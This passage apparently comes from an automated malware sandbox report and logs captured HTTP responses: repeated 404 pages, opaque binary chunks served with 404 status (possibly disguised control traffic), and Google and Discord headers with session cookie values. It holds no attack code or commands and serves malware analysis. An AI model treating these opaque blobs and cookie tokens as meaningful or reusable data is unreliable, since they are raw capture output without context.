Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 16 Apr 2024 23:37:49 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://nessotechbd.com/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: UpgradeVary: Accept-EncodingX-Endurance-Cache-Level: 2Transfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenCache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 16 Apr 2024 23:37:52 GMTContent-Type: text/html; charset=utf-8P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Content-Security-Policy: require-trusted-types-for 'script';report-uri https://csp.withgoogle.com/csp/docs-ttReferrer-Policy: originX-Content-Type-Options: nosniffX-Frame-Options: SAMEORIGINX-XSS-Protection: 1; mode=blockServer: GSESet-Cookie: NID=513=GXFE3wYNfhE-GEfYhNmek1rGxC-9_n06NmROOG7DCWK0B3zKCNE0u6GWHHB2yAIgBX36rTnn0UG4m_W9OQZK6OceKOpPIaM5vqQUwJXVSYLCoQYpV8LAB04mtir_q8dmk73V7LRo0eVkdiBPeW0sJysAy4yYcLIzRFJbuB2bdSM; expires=Wed, 16-Oct-2024 23:37:52 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=noneAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 16 Apr 2024 23:37:54 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: __cf_bm=XOjHXRXTTS9mAIPdCXCzuEZ3yZA_OcrMWpQMPMUdWYk-1713310674-1.0.1.1-FypWS5nHnMdCq7CrFd09o.FYblFf0uP828ylQjSel4G7iDmYewIA.ssnYuwNQVzIT7PmqmNAMQroQR.rD22v6Q; path=/; expires=Wed, 17-Apr-24 00:07:54 GMT; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pGLlulN8fZb%2BJYBBIz9vMuCKLsIzKwM4YG0GtGBc4OChqOd0PczzsEfeXq0U2sSn1X5AJAWa2W4OwYfGH3TZYj%2B40c85GbH7vJkHXpMoe9cMZS6lWyBRRJCfSdkjtHGN%2F4BXkA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: _cfuvid=F9pBA0XgjsS46qsUcCC2Av0tMnUyhKXeimbvxENEsPA-1713310674856-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 87580185baf04546-ATLalt-svc: h3=":443"; ma=86400
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Tue, 16 Apr 2024 23:37:17 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 38 0d 0a 04 00 00 00 79 fa f7 1f 0d 0a 30 0d 0a 0d 0a Data Ascii: 8y0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Tue, 16 Apr 2024 23:37:18 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 74 72 61 64 2d 65 69 6e 6d 79 75 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at trad-einmyus.com Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Tue, 16 Apr 2024 23:37:19 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 66 0d 0a 04 00 ed 98 a4 08 a8 37 33 7c 09 c7 22 84 f6 82 af 73 32 f3 a2 68 33 54 27 c3 83 be 8e 99 1e a2 08 c9 63 a5 53 63 97 09 f8 ea 22 e5 38 69 15 b9 e0 9e 0f a2 17 c9 02 94 a7 7a d4 60 a6 bc 8d 14 3b 84 c3 3f 44 88 dd ca 0a 86 89 a2 0c bd 74 0d 0a 30 0d 0a 0d 0a Data Ascii: 4f73|"s2h3T'cSc"8iz`;?Dt0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Tue, 16 Apr 2024 23:37:19 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 74 72 61 64 2d 65 69 6e 6d 79 75 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at trad-einmyus.com Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Tue, 16 Apr 2024 23:37:21 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 63 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f d2 83 40 0d 63 07 ea e8 8f bd a7 5e a0 10 91 60 a2 5f 53 90 1f bf ec 31 e5 0d 0a 30 0d 0a 0d 0a Data Ascii: 2cI:82O@c^`_S10
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Tue, 16 Apr 2024 23:37:29 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 74 72 61 64 2d 65 69 6e 6d 79 75 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at trad-einmyus.com Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Tue, 16 Apr 2024 23:37:30 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 74 72 61 64 2d 65 69 6e 6d 79 75 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at trad-einmyus.com Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Tue, 16 Apr 2024 23:37:30 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 74 72 61 64 2d 65 69 6e 6d 79 75 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at trad-einmyus.com Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Tue, 16 Apr 2024 23:37:32 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 61 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 95 47 04 63 1f f1 b2 81 a7 b9 10 ea 1f d1 6f f8 53 59 da 00 e9 ec 0d 0a 30 0d 0a 0d 0a Data Ascii: 2aI:82OGcoSY0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Tue, 16 Apr 2024 23:37:36 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 74 72 61 64 2d 65 69 6e 6d 79 75 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at trad-einmyus.com Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Tue, 16 Apr 2024 23:37:38 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 65 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f d3 88 53 09 6f 11 e5 a4 89 fc a9 04 b7 08 d1 6f ba 57 4d 9d 0b f4 fa 3f e3 39 1b 1d b3 f4 93 44 e1 0e 9c 1c 87 aa 76 9b 77 a7 f9 0d 0a 30 0d 0a 0d 0a Data Ascii: 3eI:82OSooWM?9Dvw0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Tue, 16 Apr 2024 23:37:41 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 74 72 61 64 2d 65 69 6e 6d 79 75 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at trad-einmyus.com Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Tue, 16 Apr 2024 23:37:45 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 66 0d 0a 04 00 ed 98 a4 08 a8 37 33 7c 09 c7 22 84 f6 82 af 73 32 f3 a2 68 33 54 27 c3 83 be 8e 99 1e a2 08 c9 63 a5 53 63 97 09 f8 ea 22 e5 38 69 15 b9 e0 9e 0f a2 17 c9 02 94 a7 7a d4 60 a6 bc 8d 14 3b 84 c3 3f 44 88 dd ca 0a 86 89 a2 0c bd 74 0d 0a 30 0d 0a 0d 0a Data Ascii: 4f73|"s2h3T'cSc"8iz`;?Dt0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Tue, 16 Apr 2024 23:37:46 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 74 72 61 64 2d 65 69 6e 6d 79 75 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at trad-einmyus.com Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Tue, 16 Apr 2024 23:37:47 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 74 72 61 64 2d 65 69 6e 6d 79 75 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at 